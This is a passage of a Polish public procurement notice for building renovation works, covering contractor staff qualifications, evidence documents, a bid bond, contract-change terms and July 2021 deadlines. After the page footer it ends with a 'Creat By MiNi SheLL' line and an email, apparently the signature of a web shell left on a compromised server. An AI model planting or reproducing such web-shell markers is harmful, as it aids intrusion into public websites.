dla<br/>minimum 1 (jednej) roboty budowlanej, polegającej na budowie, przebudowie, rozbudowie,<br/>remoncie budynku użyteczności publicznej o łącznej powierzchni użytkowej nie mniejszej niż<br/>2000,00 m2 która została zakończona oraz odebrana zgodnie z obowiązującymi w dacie odbioru<br/>przepisami powszechnie obowiązującego prawa zarówno przez inwestora jak i przez właściwe<br/>rzeczowo organy administracji publicznej. Osoba musi posiadać przez okres nie krótszy niż 5 lat<br/>uprawnienia budowlane bez ograniczeń, zgodnie z wymaganiami ustawy z dnia 7 lipca 1994r.<br/>Prawo budowlane ( z późn. zm.) do kierowania robotami budowlanymi w specjalnościach<br/>architektonicznej bądź konstrukcyjno-budowlanej lub posiadająca odpowiadające im ważne<br/>uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>b. Kierownik robót sanitarnych – osoba posiadająca przez okres nie krótszy niż 3 lata,<br/>uprawnienia budowlane bez ograniczeń, zgodnie z wymaganiami ustawy z dnia 7 lipca 1994r.<br/>Prawo budowlane (z późn. zm.), do kierowania robotami budowlanymi w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub posiadająca odpowiadające im ważne uprawnienia, które<br/>zostały wydane na podstawie wcześniej obowiązujących przepisów<br/>c. Kierownik robót elektroenergetycznych – osoba posiadająca przez okres nie krótszy niż 3 lata,<br/>uprawnienia budowlane bez ograniczeń, zgodnie z wymaganiami ustawy z dnia 7 lipca 1994r.<br/>Prawo budowlane (z późn. zm.), do kierowania robotami budowlanymi w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń: elektrycznych i elektroenergetycznych lub<br/>posiadająca odpowiadające im ważne uprawnienia, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów<br/>Samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo<br/>budowlane mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe<br/>zostały uznane na zasadach określonych w przepisach odrębnych, tj. m.in. w ustawie z dnia 22<br/>grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz.65) lub zgodnie z wcześniej<br/>obowiązującymi przepisami dotyczące uznawania ww. kwalifikacji lub posiadać prawo do<br/>świadczenia usług transgranicznych zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach<br/>zawodowych architektów oraz inżynierów budownictwa (t.j. Dz.U. 2016 poz. 1725 z późn. zm.).<br/>UWAGA! Dopuszcza się, aby powyższe funkcje były łączone, tzn. pełnione przez jedną osobę,<br/>w ramach posiadanych przez nią uprawnień.<br/>Zamawiający wymaga od wykonawców wskazania w wykazie osób informacji na temat<br/>kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego w/w<br/>osób, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do<br/>dysponowania tymi osobami.<br/>W odniesieniu do warunku dotyczącego wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają robotę budowalną lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>Zamawiający dopuszcza sumowanie potencjału wykonawców wspólnie ubiegających się o<br/>zamówienie lub wykonawców i podmiotów udostępniających zasoby w zakresie osób<br/>skierowanych do realizacji zamówienia. Powyższe oznacza, że osoby te mogą być<br/>zaangażowane przez jednego wykonawcę, jeden podmiot udostępniający zasoby lub przez kilku<br/>wykonawców lub podmioty udostępniające zasoby.<br/>Wykazanie spełnienia warunków udziału w postępowaniu przez Wykonawcę poprzez<br/>korzystanie z zasobów innych podmiotów zostały opisane w pkt. IX SWZ. 3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej dopuszcza łączne<br/>spełnianie warunku przez Wykonawców<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne<br/>przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postepowania wskazanych przez<br/>Zamawiającego, o których mowa w art. 108 ust. 1 pkt. 3 – 6 oraz art. 109 ust. 1 pkt. 4, 5 i 7 ustawyzałącznik<br/>nr 7 do SWZ.<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji<br/>3) Informacja z Krajowego Rejestru Karnego w zakresie dotyczącym podstaw wykluczenia wskazanych<br/>w art. 108 ust. 1 pkt 1, 2 i 4 ustawy PZP sporządzona nie wcześniej niż 6 miesięcy przed jej złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy- w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czy dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot , na rzecz którego roboty te zostały wykonane, a jeżeli Wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów- inne odpowiednie<br/>dokumenty. Wzór wykazu stanowi załącznik nr 9 do SWZ.<br/>2) Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu<br/>stanowi załącznik nr 10 do swz.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> formularz oferty, pełnomocnictwo (jeżeli dotyczy), oświadczenie o spełnianiu warunków oraz<br/>niepodleganiu wykluczeniu, o którym mowa w art. 273 ust. 1 ustawy PZP, zobowiązanie innego<br/>podmiotu wraz z oświadczeniem tego podmiotu o braku podstaw wykluczenia tego podmiotu<br/>oraz odpowiednio o spełnianiu warunków udziału w postępowaniu, dowód wniesienia wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca składający ofertę zobowiązany jest wnieść wadium w wysokości 80 000,00 zł<br/>(słownie: osiemdziesiąt tysięcy złotych) przed upływem terminu składania ofert i utrzymuje<br/>nieprzerwanie do dnia upływu terminu zawiązania ofertą , z wyjątkiem przypadków, o których<br/>mowa w art. 98 ust. 1 pkt. 2 i 3 oraz ust. 2 <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale VIII SWZ, składa każdy z Wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych<br/>wykonywanych wspólnie z innymi wykonawcami, wykaz, o którym mowa w Rozdziale VIII pkt.4.<br/>4) SWZ dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio<br/>uczestniczył.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>5. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>6. W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego Wykonawcy ci - przed zawarciem umowy z Zamawiającym -<br/>są zobowiązani do przedłożenia zamawiającemu umowy regulującej ich współpracę w zakresie<br/>przedmiotowego zamówienia.<br/>7. W przypadku oferty wspólnej w formularzu oferty w miejscu „Nazwa i adres Wykonawcy”<br/>należy wskazać wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień Umowy jest dopuszczalna jeżeli zachodzi jedna z okoliczności<br/>wymienionych w art. 455 PZP. Zamawiający, w granicach dozwolonych przepisami art. 455 ust.<br/>1 pkt 1 PZP, dopuszcza możliwość zmiany umowy w szczególności w przypadku:<br/>a) na uzasadniony wniosek Wykonawcy lub Zamawiającego, jeżeli zmiana wynika z<br/>okoliczności, której Wykonawca nie mógł przewidzieć na etapie składania ofert i nie jest przez<br/>niego zawiniona,<br/>b) przedłużenia terminu wykonana zamówienia o czas niezbędny na jego wykonanie, w<br/>przypadku wystąpienia siły wyższej, tj. wyjątkowego zdarzenia, okoliczności lub warunków<br/>atmosferycznych, które uniemożliwiają wykonywanie prac w ustalonym terminie,<br/>c) przedłużenia terminu wykonania zamówienia o czas niezbędny na jego wykonanie, w<br/>przypadku wystąpienia innego niż siła wyższa zdarzenia nieprzewidywalnego i losowego,<br/>pozostającego poza kontrolą Stron i za które żadna ze Stron nie ponosi odpowiedzialności,<br/>d) zmiany terminu wykonania zamówienia będącej następstwem okoliczności leżących po<br/>stronie Zamawiającego, takich jak: niedające się przewidzieć utrudnienia, zawieszenia robót lub<br/>inne przeszkody dające się przypisać Zamawiającemu,<br/>e) zmiany w zakresie udziału w realizacji zamówienia podwykonawców. Jeżeli zmiana albo<br/>rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 PZP w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny<br/>podwykonawca lub Wykonawca samodzielnie spełnia te warunku w stopniu nie mniejszym niż<br/>podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o<br/>udzielenie zamówienia. Zmiana ta nie może prowadzić do zwiększenia wynagrodzenia<br/>Wykonawcy,<br/>f) zmiany terminu wykonania zamówienia z powodu zmiany istotnych przepisów prawa,<br/>powodującej konieczność dostosowania przedmiotu zamówienia do zmiany przepisów;<br/>g) zmiany osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>wskazanych w Załączniku nr 8 do Umowy, pod warunkiem, że nowa osoba będzie posiadać<br/>kwalifikacje zawodowe, uprawnienia, doświadczenie i wykształcenie spełniające warunki<br/>określone w SWZ;<br/>h) zmiany pracowników świadczących czynności wskazane w § 10 ust. 1, wymienionych w<br/>Załączniku nr 14 do Umowy, pod warunkiem, że osoby te spełniają wymagania określone dla<br/>danego stanowiska pracy.<br/>2. Zmiana treści Umowy wymaga zgody obydwu Stron wyrażonej w formie pisemnego aneksu<br/>pod rygorem nieważności, z zastrzeżeniem ust. 3.<br/>3. Nie stanowi zmiany Umowy w rozumieniu art. 455 PZP i nie wymaga zawarcia aneksu:<br/>a) zmiana danych związana z obsługą administracyjno – organizacyjną Umowy (np. zmiana<br/>numeru rachunku),<br/>b) zmiana danych rejestrowych, danych teleadresowych i zmiana osób wskazanych do<br/>reprezentacji i kontaktów między Stronami, c) zmiana w zakresie wykonywania czynności Wykonawcy, która będzie obowiązywała pod<br/>warunkiem wydania w formie pisemnej polecenia wykonania lub odstąpienia od wykonania,<br/>d) zmiana postanowień Umowy na skutek zmian powszechnie obowiązującego prawa <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-14 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://marr.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-14 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Protokolarne przekazanie terenu budowy i rozpoczęcie prac budowlanych w budynku nastąpi<br/>nie wcześniej niż 1 września 2021 r. Wykonawca zobowiązuje się wykonać zamówienie w<br/>terminie nie dłuższym niż 217 dni kalendarzowych licząc od dnia 1 września 2021 r. lub od dnia<br/>podpisania Umowy w przypadku gdy Umowa zostanie zawarta po dniu 1 września 2021 r., w<br/>tym etap I należy wykonać w terminie do 100 dni kalendarzowych. Dla zachowania powyższych<br/>terminów, najpóźniej w tychże dniach winien nastąpić protokolarny odbiór prac przez<br/>Zamawiającego.<br/>Zamawiający informuje, że wszystkie prace generujące hałas lub zapylenie, stanowiące<br/>utrudnienie dla funkcjonowania nieremontowanych kondygnacji budynku mogą być realizowane<br/>od poniedziałku do piątku od godziny 16:00 do godziny 5:00 następnego dnia, z wyłączeniem<br/>soboty i niedzieli w które to dni roboty mogą trwać całą dobę – do poniedziałku do godziny 5:00.<br/>Ponadto Zamawiający wymaga, aby podczas prowadzenia wszystkich robót budowlanych<br/>Wykonawca zapewnił nieograniczony dostęp do budynku. Podczas remontu na części<br/>kondygnacji nieobjętych robotami budowlanymi będą pracować pracownicy Zamawiającego a na wyższych kondygnacjach (powyżej IV piętra) swoją siedzibę m.in. ma sąd oraz architektoniczna<br/>pracownia projektowa, które również muszą mieć zapewnioną ciągłość funkcjonowania.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-29 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com